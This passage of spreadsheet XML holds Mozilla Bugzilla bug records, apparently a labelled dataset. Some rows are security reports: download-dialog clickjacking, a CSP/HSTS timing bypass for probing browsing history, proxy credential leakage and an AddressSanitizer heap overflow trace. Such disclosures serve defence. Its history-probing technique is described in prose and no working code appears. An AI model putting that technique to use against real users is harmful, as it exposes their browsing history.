      <c r="J125" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K125" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L125" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M125" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N125" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O125" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P125" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main27+]</t>
        </is>
      </c>
      <c r="Q125" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R125" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S125" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T125" t="n">
        <v>1</v>
      </c>
      <c r="U125" t="n">
        <v>0</v>
      </c>
      <c r="V125" t="n">
        <v>45</v>
      </c>
      <c r="W125" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release)
Build ID: 20130814063812
Steps to reproduce:
the window of download/execute files can be clickjacked because there is no secure time before click on the "ok" button (for download/execute).
Actual results:
the file is executed!
Expected results:
button "ok" is directly pressed!</t>
        </is>
      </c>
      <c r="X125" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" t="n">
        <v>1335801</v>
      </c>
      <c r="B126" t="inlineStr">
        <is>
          <t>2017-02-01 09:11:26 -0800</t>
        </is>
      </c>
      <c r="C126" t="inlineStr">
        <is>
          <t>Intermittent browser/base/content/test/referrer/browser_referrer_middle_click.js | Test timed out after | A promise chain failed to handle a rejection:  - TypeError: content.document.getElementById(...) is null</t>
        </is>
      </c>
      <c r="D126" t="inlineStr">
        <is>
          <t>2017-03-20 14:33:58 -0700</t>
        </is>
      </c>
      <c r="E126" t="n">
        <v>1</v>
      </c>
      <c r="F126" t="n">
        <v>1</v>
      </c>
      <c r="G126" t="n">
        <v>2</v>
      </c>
      <c r="H126" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I126" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J126" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K126" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L126" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M126" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N126" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O126" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P126" t="inlineStr">
        <is>
          <t>[e10s-multi:+][stockwell fixed]</t>
        </is>
      </c>
      <c r="Q126" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R126" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S126" t="inlineStr">
        <is>
          <t>Firefox 54</t>
        </is>
      </c>
      <c r="T126" t="n">
        <v>1</v>
      </c>
      <c r="U126" t="n">
        <v>0</v>
      </c>
      <c r="V126" t="n">
        <v>94</v>
      </c>
      <c r="W126" t="inlineStr">
        <is>
          <t>Filed by: philringnalda [at] gmail.com
https://treeherder.mozilla.org/logviewer.html#?job_id=73560505&amp;repo=mozilla-inbound
https://archive.mozilla.org/pub/firefox/tinderbox-builds/mozilla-inbound-win32/1485955209/mozilla-inbound_win7_vm_test-mochitest-e10s-browser-chrome-4-bm137-tests1-windows-build64.txt.gz</t>
        </is>
      </c>
      <c r="X126" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" t="n">
        <v>908680</v>
      </c>
      <c r="B127" t="inlineStr">
        <is>
          <t>2013-08-23 08:33:53 -0700</t>
        </is>
      </c>
      <c r="C127" t="inlineStr">
        <is>
          <t>Daily views on charts are 19 days behind</t>
        </is>
      </c>
      <c r="D127" t="inlineStr">
        <is>
          <t>2013-08-26 11:06:22 -0700</t>
        </is>
      </c>
      <c r="E127" t="n">
        <v>1</v>
      </c>
      <c r="F127" t="n">
        <v>1</v>
      </c>
      <c r="G127" t="n">
        <v>5</v>
      </c>
      <c r="H127" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I127" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J127" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K127" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N127" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O127" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P127" t="inlineStr">
        <is>
          <t>u=contributor c=graphs p= s=2013.17</t>
        </is>
      </c>
      <c r="Q127" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R127" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S127" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T127" t="n">
        <v>1</v>
      </c>
      <c r="U127" t="n">
        <v>0</v>
      </c>
      <c r="V127" t="n">
        <v>7</v>
      </c>
      <c r="W127" t="inlineStr">
        <is>
          <t>This is a regression. Possibly related to bug 904235.
STR:
1. View any sumo chart with the daily time scale, e.g. https://support.mozilla.org/en-US/kpi/dashboard
2. Notice that the latest visible day is 19 days previous, i.e. Aug 4 for Aug 23.
Expected result: Latest visible day should be the last complete day we have data for.</t>
        </is>
      </c>
      <c r="X127" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" t="n">
        <v>1285003</v>
      </c>
      <c r="B128" t="inlineStr">
        <is>
          <t>2016-07-06 13:51:51 -0700</t>
        </is>
      </c>
      <c r="C128" t="inlineStr">
        <is>
          <t>Probe browser history via HSTS/301 redirect + CSP</t>
        </is>
      </c>
      <c r="D128" t="inlineStr">
        <is>
          <t>2022-07-07 10:57:54 -0700</t>
        </is>
      </c>
      <c r="E128" t="n">
        <v>1</v>
      </c>
      <c r="F128" t="n">
        <v>1</v>
      </c>
      <c r="G128" t="n">
        <v>3</v>
      </c>
      <c r="H128" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I128" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J128" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K128" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L128" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M128" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N128" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O128" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P128" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][domsecurity-active][adv-main50+] Embargo until chrome fixed</t>
        </is>
      </c>
      <c r="Q128" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R128" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S128" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T128" t="n">
        <v>1</v>
      </c>
      <c r="U128" t="n">
        <v>0</v>
      </c>
      <c r="V128" t="n">
        <v>11</v>
      </c>
      <c r="W128" t="inlineStr">
        <is>
          <t>Created attachment 8768537
csp probing.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Expected results:
This is an updated version of the Sniffly attack (for the original attack, see https://bugs.chromium.org/p/chromium/issues/detail?id=544765). The original Sniffly vulnerability was fixed by making the CSP directive "img-src http:" === "img-src http: https:". But I find a way to bypass this fix, and make it possible again to probe which domains or URLs have been visited by users: the new trick is to use "Content-Security-Policy: img-src http://example.com:80". It allows http://example.com, but blocks https://example.com. This means by setting this CSP directive, I can now measure the time it takes for Firefox to redirect from http to https, and see if it happens due to a cache or a server-side redirect, which can be used to guess whether the user has visited that link before.
This vulnerability is reproducible on Firefox 47.0.1 (stable version, Windows 10 x64).
The PoC is attached. To reproduce: 1) clear Firefox cache; 2) disable HTTPS Everywhere if you have it installed; 3) visit http://www.mozilla.org/; 4) visit http://www.npmjs.com/; 5) open the PoC in the same Firefox window.
Please note that this bug is also present in Chrome (tracked on https://bugs.chromium.org/p/chromium/issues/detail?id=625945). So please don't disclose this bug until Chromium fixes or rejects this issue on their side. Thanks!</t>
        </is>
      </c>
      <c r="X128" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" t="n">
        <v>267263</v>
      </c>
      <c r="B129" t="inlineStr">
        <is>
          <t>2004-11-01 22:31:00 -0800</t>
        </is>
      </c>
      <c r="C129" t="inlineStr">
        <is>
          <t>Browser does not test to see that server sending proxy auth request is the proxy server (ssl/https).</t>
        </is>
      </c>
      <c r="D129" t="inlineStr">
        <is>
          <t>2005-02-01 09:08:07 -0800</t>
        </is>
      </c>
      <c r="E129" t="n">
        <v>1</v>
      </c>
      <c r="F129" t="n">
        <v>1</v>
      </c>
      <c r="G129" t="n">
        <v>3</v>
      </c>
      <c r="H129" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I129" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J129" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K129" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L129" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N129" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O129" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P129" t="inlineStr"/>
      <c r="Q129" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R129" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S129" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T129" t="n">
        <v>1</v>
      </c>
      <c r="U129" t="n">
        <v>0</v>
      </c>
      <c r="V129" t="n">
        <v>20</v>
      </c>
      <c r="W129" t="inlineStr">
        <is>
          <t>I haven't seen anywhere in the code where auto-send proxy auth like NTLM and now
SPNEGO are checked to make sure that the proxy server which is configured on the
channel is actually the same server that is sending the 407 to the client.  Did
I miss something?
What would happen if I was connecting to an SSL protected site which uses the
connect method through the proxy and that site sends a 407 w/ NTLM or SPNEGO? 
Would the browser autosend my credentials out site of my network just because a
proxy was configured for that channel?</t>
        </is>
      </c>
      <c r="X129" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" t="n">
        <v>313816</v>
      </c>
      <c r="B130" t="inlineStr">
        <is>
          <t>2005-10-25 15:52:09 -0700</t>
        </is>
      </c>
      <c r="C130" t="inlineStr">
        <is>
          <t>Hard to read top 100 bug descriptions in Step 1 of reporting a bug</t>
        </is>
      </c>
      <c r="D130" t="inlineStr">
        <is>
          <t>2007-03-04 19:54:42 -0800</t>
        </is>
      </c>
      <c r="E130" t="n">
        <v>1</v>
      </c>
      <c r="F130" t="n">
        <v>1</v>
      </c>
      <c r="G130" t="n">
        <v>4</v>
      </c>
      <c r="H130" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I130" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J130" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K130" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N130" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O130" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P130" t="inlineStr"/>
      <c r="Q130" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R130" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S130" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T130" t="n">
        <v>1</v>
      </c>
      <c r="U130" t="n">
        <v>1</v>
      </c>
      <c r="V130" t="n">
        <v>19</v>
      </c>
      <c r="W130" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
The Top 100 window is very short, vertically, so it is hard to read the content of a truly popular bug. Perhaps when you actually select such a bug to read, you could get a WHOLE PAGE of the content rather than three or four lines at a time. Since it is a Top 100 bug report, you may be suspicious that the contents are looooong and give it some room to stretch out and relax.
Reproducible: Always
Steps to Reproduce:
1.Pick the second bug in Top 100.
2.Read the contents, very slowly and painfully
3.Write that up as a bug. That's what I'm doing.
Actual Results:  
hard to read
Expected Results:  
easy to read
switched to a much larger window so more can be seen before needing to scroll more.</t>
        </is>
      </c>
      <c r="X130" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" t="n">
        <v>54079</v>
      </c>
      <c r="B131" t="inlineStr">
        <is>
          <t>2000-09-25 16:03:45 -0700</t>
        </is>
      </c>
      <c r="C131" t="inlineStr">
        <is>
          <t>In Composer, Netscape will crash at selecting submenu of HELP</t>
        </is>
      </c>
      <c r="D131" t="inlineStr">
        <is>
          <t>2001-09-12 00:43:03 -0700</t>
        </is>
      </c>
      <c r="E131" t="n">
        <v>1</v>
      </c>
      <c r="F131" t="n">
        <v>1</v>
      </c>
      <c r="G131" t="n">
        <v>3</v>
      </c>
      <c r="H131" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I131" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J131" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K131" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L131" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M131" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N131" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O131" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P131" t="inlineStr">
        <is>
          <t>[nsbeta3++][p:1]</t>
        </is>
      </c>
      <c r="Q131" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R131" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S131" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T131" t="n">
        <v>1</v>
      </c>
      <c r="U131" t="n">
        <v>0</v>
      </c>
      <c r="V131" t="n">
        <v>19</v>
      </c>
      <c r="W131" t="inlineStr">
        <is>
          <t>In Composer window, when you select submenu of Help menu, Netscape
will crash.
steps of reproduce
1. Open Composer window
2. Select menu as follows
   Help | What's New in Netscape6?
   Help | New to the Net Tutorial
   Help | Netscape Technical Support
   Help | Security Center
   Help | International Users
   Help | Feedback Center
Netscape will crash.
I sent talkback report at every selection of submenus.
Stack traces are same.
Talkback incident #18012463
 Trigger Type:  Program Crash 
 Trigger Reason:  Access violation 
 Thread ID:   
 Call Stack:    (Signature = nsJSContext::ExecuteScript 92ef1dc1) 
 nsJSContext::ExecuteScript 
[d:\builds\seamonkey\mozilla\dom\src\base\nsJSEnvironment.cpp, line 695]
 nsXULDocument::ExecuteScript 
[d:\builds\seamonkey\mozilla\rdf\content\src\nsXULDocument.cpp, line 5586]
 nsXULDocument::LoadScript 
[d:\builds\seamonkey\mozilla\rdf\content\src\nsXULDocument.cpp, line 5443]
 nsXULDocument::ResumeWalk 
[d:\builds\seamonkey\mozilla\rdf\content\src\nsXULDocument.cpp, line 5272]
 nsXULDocument::CachedChromeStreamListener::OnStopRequest
[d:\builds\seamonkey\mozilla\rdf\content\src\nsXULDocument.cpp, line 6509]
 nsDocumentOpenInfo::OnStopRequest 
[d:\builds\seamonkey\mozilla\uriloader\base\nsURILoader.cpp, line 269]
 nsCachedChromeChannel::HandleStopLoadEvent 
[d:\builds\seamonkey\mozilla\rdf\chrome\src\nsChromeProtocolHandler.cpp, line 
535]
 PL_HandleEvent 
[d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c, line 576]
 PL_ProcessPendingEvents 
[d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c, line 512]
 _md_EventReceiverProc 
[d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c, line 1046]
 nsAppShellService::Run 
[d:\builds\seamonkey\mozilla\xpfe\appshell\src\nsAppShellService.cpp, line 408]
 netscp6.exe + 0x1711 (0x00401711) 
 netscp6.exe + 0x1230 (0x00401230) 
 netscp6.exe + 0x2aae (0x00402aae) 
 KERNEL32.DLL + 0x7903 (0x77e57903) 
Tested 2000-09-25-08 Win32 and Linux, and 2000-09-25-12 Mac build.</t>
        </is>
      </c>
      <c r="X131" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" t="n">
        <v>1486314</v>
      </c>
      <c r="B132" t="inlineStr">
        <is>
          <t>2018-08-26 14:04:49 -0700</t>
        </is>
      </c>
      <c r="C132" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in [@ mozilla::TextEditRules::CreateBogusNodeIfNeeded]</t>
        </is>
      </c>
      <c r="D132" t="inlineStr">
        <is>
          <t>2019-08-07 17:09:45 -0700</t>
        </is>
      </c>
      <c r="E132" t="n">
        <v>1</v>
      </c>
      <c r="F132" t="n">
        <v>1</v>
      </c>
      <c r="G132" t="n">
        <v>3</v>
      </c>
      <c r="H132" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I132" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J132" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K132" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L132" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M132" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N132" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O132" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P132" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main63+]</t>
        </is>
      </c>
      <c r="Q132" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R132" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S132" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T132" t="n">
        <v>1</v>
      </c>
      <c r="U132" t="n">
        <v>0</v>
      </c>
      <c r="V132" t="n">
        <v>20</v>
      </c>
      <c r="W132" t="inlineStr">
        <is>
          <t>Test case is being reduced and will be added once complete.
==17501==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000705a00 at pc 0x7f13727d9a88 bp 0x7fff324e36a0 sp 0x7fff324e3698
READ of size 8 at 0x602000705a00 thread T0 (file:// Content)
    #0 0x7f13727d9a87 in Equals src/dom/base/nsAttrName.h:110:50
    #1 0x7f13727d9a87 in AttrArray::GetAttr(nsAtom*, int) const src/dom/base/AttrArray.cpp:42
    #2 0x7f1378aad8da in IsMozEditorBogusNode src/obj-firefox/dist/include/mozilla/dom/Element.h:2026:35
    #3 0x7f1378aad8da in mozilla::TextEditRules::CreateBogusNodeIfNeeded() src/editor/libeditor/TextEditRules.cpp:1539
    #4 0x7f1378aacf04 in mozilla::TextEditRules::Init(mozilla::TextEditor*) src/editor/libeditor/TextEditRules.cpp:155:17
    #5 0x7f1378ac2748 in mozilla::TextEditor::EndEditorInit() src/editor/libeditor/TextEditor.cpp:214:17
    #6 0x7f1378ac50c4 in ~AutoEditInitRulesTrigger src/editor/libeditor/TextEditUtils.cpp:93:28
    #7 0x7f1378ac50c4 in mozilla::TextEditor::Init(nsIDocument&amp;, mozilla::dom::Element*, nsISelectionController*, unsigned int, nsTSubstring&lt;char16_t&gt; const&amp;) src/editor/libeditor/TextEditor.cpp:148
    #8 0x7f1376824f41 in nsTextEditorState::PrepareEditor(nsTSubstring&lt;char16_t&gt; const*) src/dom/html/nsTextEditorState.cpp:1424:25
    #9 0x7f1379518579 in nsTextControlFrame::EnsureEditorInitialized() src/layout/forms/nsTextControlFrame.cpp:315:28
    #10 0x7f137661f8c3 in mozilla::dom::HTMLInputElement::GetEventTargetParent(mozilla::EventChainPreVisitor&amp;) src/dom/html/HTMLInputElement.cpp:3387:25
    #11 0x7f13762d1092 in mozilla::EventTargetChainItem::GetEventTargetParent(mozilla::EventChainPreVisitor&amp;) src/dom/events/EventDispatcher.cpp:495:12
    #12 0x7f13762d7347 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) src/dom/events/EventDispatcher.cpp:1001:15
    #13 0x7f13762dc6c6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) src/dom/events/EventDispatcher.cpp
    #14 0x7f137260208d in nsContentUtils::DispatchEvent(nsIDocument*, nsISupports*, mozilla::WidgetEvent&amp;, mozilla::EventMessage, mozilla::CanBubble, mozilla::Cancelable, mozilla::Trusted, bool*, mozilla::ChromeOnlyDispatch) src/dom/base/nsContentUtils.cpp:4471:17
    #15 0x7f1376252ed1 in nsresult nsContentUtils::DispatchTrustedEvent&lt;mozilla::WidgetEvent&gt;(nsIDocument*, nsISupports*, mozilla::EventMessage, mozilla::CanBubble, mozilla::Cancelable, bool*, mozilla::ChromeOnlyDispatch) src/dom/base/nsContentUtils.h:1381:12
    #16 0x7f1376252718 in mozilla::AsyncEventDispatcher::Run() src/dom/events/AsyncEventDispatcher.cpp:54:12
    #17 0x7f136ea73902 in mozilla::SchedulerGroup::Runnable::Run() src/xpcom/threads/SchedulerGroup.cpp:337:32
    #18 0x7f136eab0850 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:1167:14
    #19 0x7f136eab9565 in NS_ProcessNextEvent(nsIThread*, bool) src/xpcom/threads/nsThreadUtils.cpp:519:10
    #20 0x7f136fc9887e in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:97:21
    #21 0x7f136fb9a4cc in RunInternal src/ipc/chromium/src/base/message_loop.cc:325:10
    #22 0x7f136fb9a4cc in RunHandler src/ipc/chromium/src/base/message_loop.cc:318
    #23 0x7f136fb9a4cc in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:298
    #24 0x7f13786ba316 in nsBaseAppShell::Run() src/widget/nsBaseAppShell.cpp:158:27
    #25 0x7f137ca44b7e in XRE_RunAppShell() src/toolkit/xre/nsEmbedFunctions.cpp:944:22
    #26 0x7f136fb9a4cc in RunInternal src/ipc/chromium/src/base/message_loop.cc:325:10
    #27 0x7f136fb9a4cc in RunHandler src/ipc/chromium/src/base/message_loop.cc:318
    #28 0x7f136fb9a4cc in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:298
    #29 0x7f137ca43c35 in XRE_InitChildProcess(int, char**, XREChildData const*) src/toolkit/xre/nsEmbedFunctions.cpp:770:34
    #30 0x4f5b01 in content_process_main src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #31 0x4f5b01 in main src/browser/app/nsBrowserApp.cpp:287
    #32 0x7f139221d82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
    #33 0x424edc in _start (firefox+0x424edc)
0x602000705a00 is located 10 bytes to the right of 6-byte region [0x6020007059f0,0x6020007059f6)
allocated by thread T0 (file:// Content) here:
    #0 0x4c5623 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7f1372cfb5df in nsTextFragment::SetTo(char16_t const*, int, bool, bool) src/dom/base/nsTextFragment.cpp:315:37
    #2 0x7f13727eb3a8 in mozilla::dom::CharacterData::SetTextInternal(unsigned int, unsigned int, char16_t const*, unsigned int, bool, CharacterDataChangeInfo::Details*) src/dom/base/CharacterData.cpp:302:13
    #3 0x7f13727ef1f6 in mozilla::dom::CharacterData::SetText(char16_t const*, unsigned int, bool) src/dom/base/CharacterData.cpp:615:10
    #4 0x7f137951be12 in SetText src/obj-firefox/dist/include/mozilla/dom/CharacterData.h:156:12
    #5 0x7f137951be12 in nsTextControlFrame::UpdateValueDisplay(bool, bool, nsTSubstring&lt;char16_t&gt; const*) src/layout/forms/nsTextControlFrame.cpp:1312
    #6 0x7f1376824027 in nsTextEditorState::PrepareEditor(nsTSubstring&lt;char16_t&gt; const*) src/dom/html/nsTextEditorState.cpp:1376:23
    #7 0x7f1379518579 in nsTextControlFrame::EnsureEditorInitialized() src/layout/forms/nsTextControlFrame.cpp:315:28
    #8 0x7f137661f8c3 in mozilla::dom::HTMLInputElement::GetEventTargetParent(mozilla::EventChainPreVisitor&amp;) src/dom/html/HTMLInputElement.cpp:3387:25
    #9 0x7f13762d1092 in mozilla::EventTargetChainItem::GetEventTargetParent(mozilla::EventChainPreVisitor&amp;) src/dom/events/EventDispatcher.cpp:495:12
    #10 0x7f13762d7347 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) src/dom/events/EventDispatcher.cpp:1001:15
    #11 0x7f13762dc6c6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) src/dom/events/EventDispatcher.cpp
    #12 0x7f137260208d in nsContentUtils::DispatchEvent(nsIDocument*, nsISupports*, mozilla::WidgetEvent&amp;, mozilla::EventMessage, mozilla::CanBubble, mozilla::Cancelable, mozilla::Trusted, bool*, mozilla::ChromeOnlyDispatch) src/dom/base/nsContentUtils.cpp:4471:17
    #13 0x7f1376252ed1 in nsresult nsContentUtils::DispatchTrustedEvent&lt;mozilla::WidgetEvent&gt;(nsIDocument*, nsISupports*, mozilla::EventMessage, mozilla::CanBubble, mozilla::Cancelable, bool*, mozilla::ChromeOnlyDispatch) src/dom/base/nsContentUtils.h:1381:12
    #14 0x7f1376252718 in mozilla::AsyncEventDispatcher::Run() src/dom/events/AsyncEventDispatcher.cpp:54:12
    #15 0x7f136ea73902 in mozilla::SchedulerGroup::Runnable::Run() src/xpcom/threads/SchedulerGroup.cpp:337:32
    #16 0x7f136eab0850 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:1167:14
    #17 0x7f136eab9565 in NS_ProcessNextEvent(nsIThread*, bool) src/xpcom/threads/nsThreadUtils.cpp:519:10
    #18 0x7f136fc9887e in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:97:21
    #19 0x7f136fb9a4cc in RunInternal src/ipc/chromium/src/base/message_loop.cc:325:10
    #20 0x7f136fb9a4cc in RunHandler src/ipc/chromium/src/base/message_loop.cc:318
    #21 0x7f136fb9a4cc in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:298
    #22 0x7f13786ba316 in nsBaseAppShell::Run() src/widget/nsBaseAppShell.cpp:158:27</t>
        </is>
      </c>
      <c r="X132" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" t="n">
        <v>219690</v>
      </c>
      <c r="B133" t="inlineStr">
        <is>
          <t>2003-09-19 05:23:12 -0700</t>
        </is>
      </c>
      <c r="C133" t="inlineStr">
        <is>
          <t>When deleting products and usebuggroups is set, blessgroupset is not updated</t>
        </is>
      </c>
      <c r="D133" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:37 -0800</t>
        </is>
      </c>
      <c r="E133" t="n">
        <v>1</v>
      </c>
      <c r="F133" t="n">
        <v>1</v>
      </c>
      <c r="G133" t="n">
        <v>4</v>
      </c>
      <c r="H133" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I133" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J133" t="inlineStr">
        <is>
          <t>Administration</t>
